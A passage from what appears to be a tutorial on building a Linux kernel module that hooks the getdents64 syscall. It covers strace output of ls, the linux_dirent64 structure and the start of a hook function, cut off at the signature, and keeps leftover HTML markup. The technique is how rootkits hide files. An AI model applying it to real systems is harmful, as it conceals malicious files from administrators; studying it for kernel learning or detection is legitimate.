37244, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76c6000/span/span span class="code-line"span class="go"mmap2(0xb76ce000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x7) = 0xb76ce000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libc.so.6quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240o\1\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0755, st_size=1441960, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 1456504, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7562000/span/span span class="code-line"span class="go"mprotect(0xb76bf000, 4096, PROT_NONE) = 0/span/span span class="code-line"span class="go"mmap2(0xb76c0000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15d) = 0xb76c0000/span/span span class="code-line"span class="go"mmap2(0xb76c3000, 10616, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb76c3000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libdl.so.2quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\n\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=9844, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 12408, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb755e000/span/span span class="code-line"span class="go"mmap2(0xb7560000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7560000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/i686/cmov/libpthread.so.0quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220L\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0755, st_size=117009, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 98816, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7545000/span/span span class="code-line"span class="go"mmap2(0xb755a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x14) = 0xb755a000/span/span span class="code-line"span class="go"mmap2(0xb755c000, 4608, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb755c000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"access(quot;/etc/ld.so.nohwcapquot;, F_OK) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/lib/i386-linux-gnu/libattr.so.1quot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"read(3, quot;\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0\20\0\0004\0\0\0quot;..., 512) = 512/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=17864, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 20656, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb753f000/span/span span class="code-line"span class="go"mmap2(0xb7543000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x3) = 0xb7543000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb753e000/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb753d000/span/span span class="code-line"span class="go"set_thread_area({entry_number:-1 -gt; 6, base_addr:0xb753d720, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0/span/span span class="code-line"span class="go"mprotect(0xb7543000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb755a000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb7560000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76c0000, 8192, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76ce000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76d8000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb76f8000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0x8063000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"mprotect(0xb7736000, 4096, PROT_READ) = 0/span/span span class="code-line"span class="go"munmap(0xb76fa000, 116616) = 0/span/span span class="code-line"span class="go"set_tid_address(0xb753d788) = 20395/span/span span class="code-line"span class="go"set_robust_list(0xb753d790, 0xc) = 0/span/span span class="code-line"span class="go"futex(0xbf8906c0, FUTEX_WAIT_BITSET_PRIVATE|FUTEX_CLOCK_REALTIME, 1, NULL, bf8906d0) = -1 EAGAIN (Resource temporarily unavailable)/span/span span class="code-line"span class="go"rt_sigaction(SIGRTMIN, {0xb75496e0, [], SA_SIGINFO}, NULL, 8) = 0/span/span span class="code-line"span class="go"rt_sigaction(SIGRT_1, {0xb7549b70, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0/span/span span class="code-line"span class="go"rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0/span/span span class="code-line"span class="go"getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0/span/span span class="code-line"span class="go"uname({sys=quot;Linuxquot;, node=quot;devquot;, ...}) = 0/span/span span class="code-line"span class="go"statfs64(quot;/sys/fs/selinuxquot;, 84, 0xbf8905cc) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"statfs64(quot;/selinuxquot;, 84, {f_type=quot;EXT2_SUPER_MAGICquot;, f_bsize=4096, f_blocks=4905183, f_bfree=1413721, f_bavail=1158784, f_files=1256640, f_ffree=807533, f_fsid={-583175880, 1006898437}, f_namelen=255, f_frsize=4096}) = 0/span/span span class="code-line"span class="go"brk(0) = 0x9073000/span/span span class="code-line"span class="go"brk(0x9094000) = 0x9094000/span/span span class="code-line"span class="go"open(quot;/proc/filesystemsquot;, O_RDONLY|O_LARGEFILE) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7716000/span/span span class="code-line"span class="go"read(3, quot;nodev\tsysfs\nnodev\trootfs\nnodev\trquot;..., 1024) = 260/span/span span class="code-line"span class="go"read(3, quot;quot;, 1024) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"munmap(0xb7716000, 4096) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/locale-archivequot;, O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/share/locale/locale.aliasquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=2570, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7716000/span/span span class="code-line"span class="go"read(3, quot;# Locale name alias data base.\n#quot;..., 4096) = 2570/span/span span class="code-line"span class="go"read(3, quot;quot;, 4096) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"munmap(0xb7716000, 4096) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_IDENTIFICATIONquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_IDENTIFICATIONquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=366, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 366, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7716000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/i386-linux-gnu/gconv/gconv-modules.cachequot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=26064, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 26064, PROT_READ, MAP_SHARED, 3, 0) = 0xb770f000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"futex(0xb76c2a8c, FUTEX_WAKE_PRIVATE, 2147483647) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MEASUREMENTquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MEASUREMENTquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770e000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_TELEPHONEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_TELEPHONEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=56, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 56, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770d000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_ADDRESSquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_ADDRESSquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=127, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 127, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770c000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_NAMEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_NAMEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770b000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_PAPERquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_PAPERquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb770a000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MESSAGESquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MESSAGESquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MESSAGES/SYS_LC_MESSAGESquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=52, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 52, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7709000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_MONETARYquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_MONETARYquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=290, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 290, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7708000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_COLLATEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_COLLATEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=1170770, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 1170770, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb741f000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_TIMEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_TIMEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=2470, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 2470, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7707000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_NUMERICquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_NUMERICquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7706000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.UTF-8/LC_CTYPEquot;, O_RDONLY) = -1 ENOENT (No such file or directory)/span/span span class="code-line"span class="go"open(quot;/usr/lib/locale/en_GB.utf8/LC_CTYPEquot;, O_RDONLY) = 3/span/span span class="code-line"span class="go"fstat64(3, {st_mode=S_IFREG|0644, st_size=256360, ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 256360, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb73e0000/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0/span/span span class="code-line"span class="go"ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0/span/span span class="code-line"span class="go"open(quot;.quot;, O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY|O_CLOEXEC) = 3/span/span span class="code-line"span class="go"getdents64(3, /* 29 entries */, 32768) = 1024/span/span span class="code-line"span class="go"getdents64(3, /* 0 entries */, 32768) = 0/span/span span class="code-line"span class="go"close(3) = 0/span/span span class="code-line"span class="go"fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 1), ...}) = 0/span/span span class="code-line"span class="go"mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7705000/span/span span class="code-line"span class="go"write(1, quot;hello.c hello.o\t reversquot;..., 71hello.c hello.o reverse_app reverse-app.c reverse.mod.o/span/span span class="code-line"span class="go") = 71/span/span span class="code-line"span class="go"write(1, quot;hello.ko Makefile\t reverquot;..., 67hello.ko Makefile reverse-app reverse.c reverse.o/span/span span class="code-line"span class="go") = 67/span/span span class="code-line"span class="go"write(1, quot;hello.mod.c modules.order revquot;..., 77hello.mod.c modules.order reverse-app2 reverse.ko reverse-test-app/span/span span class="code-line"span class="go") = 77/span/span span class="code-line"span class="go"write(1, quot;hello.mod.o Module.symvers revquot;..., 79hello.mod.o Module.symvers reverse-app2.c reverse.mod.c reverse-test-app.c/span/span span class="code-line"span class="go") = 79/span/span span class="code-line"span class="go"close(1) = 0/span/span span class="code-line"span class="go"munmap(0xb7705000, 4096) = 0/span/span span class="code-line"span class="go"close(2) = 0/span/span span class="code-line"span class="go"exit_group(0) = ?/span/span span class="code-line"/code/pre/div /td/tr/table pThis gives us lots of information, most of it is useless to us right now so we can use some shell-fu to get rid of it and only display the actual system calls that codels/code is using:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanstrace ls span class="m"1/spangt;/dev/null span class="m"2/spangt;/tmp/ls.stracespan class="p";/span cat /tmp/ls.strace span class="p"|/span cut -dspan class="s1"#39;(#39;/span -f1 span class="p"|/span sort -u/span span class="code-line"span class="go"access/span/span span class="code-line"span class="go"brk/span/span span class="code-line"span class="go"close/span/span span class="code-line"span class="go"execve/span/span span class="code-line"span class="go"exit_group/span/span span class="code-line"span class="go"fstat64/span/span span class="code-line"span class="go"futex/span/span span class="code-line"span class="go"getdents64/span/span span class="code-line"span class="go"getrlimit/span/span span class="code-line"span class="go"ioctl/span/span span class="code-line"span class="go"mmap2/span/span span class="code-line"span class="go"mprotect/span/span span class="code-line"span class="go"munmap/span/span span class="code-line"span class="go"open/span/span span class="code-line"span class="go"read/span/span span class="code-line"span class="go"rt_sigaction/span/span span class="code-line"span class="go"rt_sigprocmask/span/span span class="code-line"span class="go"set_robust_list/span/span span class="code-line"span class="go"set_thread_area/span/span span class="code-line"span class="go"set_tid_address/span/span span class="code-line"span class="go"statfs64/span/span span class="code-line"span class="go"uname/span/span span class="code-line"span class="go"write/span/span span class="code-line"/code/pre/div /td/tr/table pNow we have a decent list of system calls to look at we can use codeman/code to look at what these system calls do./p pAfter you have done that you will notice that codegetdents64/code strongget directory entries/strong is the one we want to look at, here is the prototype shown on the codeman/code page:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"getdents/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe man page also shows the declaration of the codelinux_dirent/code structure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"d_ino/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Inode number *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"d_off/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Offset to next linux_dirent *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"short/spanspan class="w" /spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* Length of this linux_dirent *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_name/spanspan class="p"[];/spanspan class="w" /spanspan class="cm"/* Filename (null-terminated) *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/* length is actually (d_reclen - 2 -/span/span span class="code-line"span class="cm" offsetof(struct linux_dirent, d_name) *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="cm"/*/span/span span class="code-line"span class="cm" char pad; // Zero padding byte/span/span span class="code-line"span class="cm" char d_type; // File type (only since Linux 2.6.4;/span/span span class="code-line"span class="cm" // offset is (d_reclen - 1))/span/span span class="code-line"span class="cm" *//spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis will help us when figuring out how to iterate through the list returned by this syscall./p h2Taking A Closer Look/h2 pIf you want to have a look at how the system call is implemented, you can see where in the kernel it is implemented in code/usr/include/asm-generic/unistd.h/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangrep -B span class="m"1/span getdents64 /usr/include/asm-generic/unistd.h /span span class="code-line"span class="go"/* fs/readdir.c *//span/span span class="code-line"span class="gp"#/spandefine __NR_getdents64 span class="m"61/span/span span class="code-line"span class="go"__SC_COMP(__NR_getdents64, sys_getdents64, compat_sys_getdents64)/span/span span class="code-line"/code/pre/div /td/tr/table pSo getdents64 is implemented in codefs/readdir.c/code in the kernel source./p pstrongIts worth noting that it might not tell you the relevant source file on the line above, it depends on if there were multiple syscalls implemented in the same file, have a proper look through /usr/include/asm-generic/unistd.h to see what I mean/strong./p pOn my test machine this file is in code/usr/src/linux-source-3.14/fs/readdir.c/code because I have the source package installed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangrep getdents64 /usr/src/linux-source-3.14/fs/readdir.c /span span class="code-line"span class="go"SYSCALL_DEFINE3(getdents64, unsigned int, fd,/span/span span class="code-line"span class="go" struct linux_dirent64 __user *, dirent, unsigned int, count)/span/span span class="code-line"/code/pre/div /td/tr/table pWe don't really need to know this for what we want to do but its handy to know if you are going to be kernel hacking./p pOne thing this has shown us is that codegetdents64/code takes the codelinux_dirent64/code struct and not the codelinux_dirent/code struct. After some more grepping we can see that this struct is defined in codeinclude/linux/dirent.h/code as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"u64/spanspan class="w" /spanspan class="n"d_ino/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"s64/spanspan class="w" /spanspan class="n"d_off/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"short/spanspan class="w" /spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_type/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"d_name/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is slightly different to codelinux_dirent/code and this means we will have to include codelinux/dirent.h/code in our LKM./p pIf we look at the number of entries that was returned to codels/code, we can see that it is the exact number of files in the current directory:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanstrace ls span class="m"2/spangt;span class="p"amp;/spanspan class="m"1/span span class="p"|/span grep getdents64/span span class="code-line"span class="go"getdents64(3, /* 29 entries */, 32768) = 1024/span/span span class="code-line"span class="go"getdents64(3, /* 0 entries */, 32768) = 0/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -la span class="p"|/span wc -l/span span class="code-line"span class="go"30/span/span span class="code-line"/code/pre/div /td/tr/table pThere is 1 more in the codels -la/code because of the strongtotal/strong line at the top./p pUsing all of the information we have gathered we can create our hook function:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"asmlinkage/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan 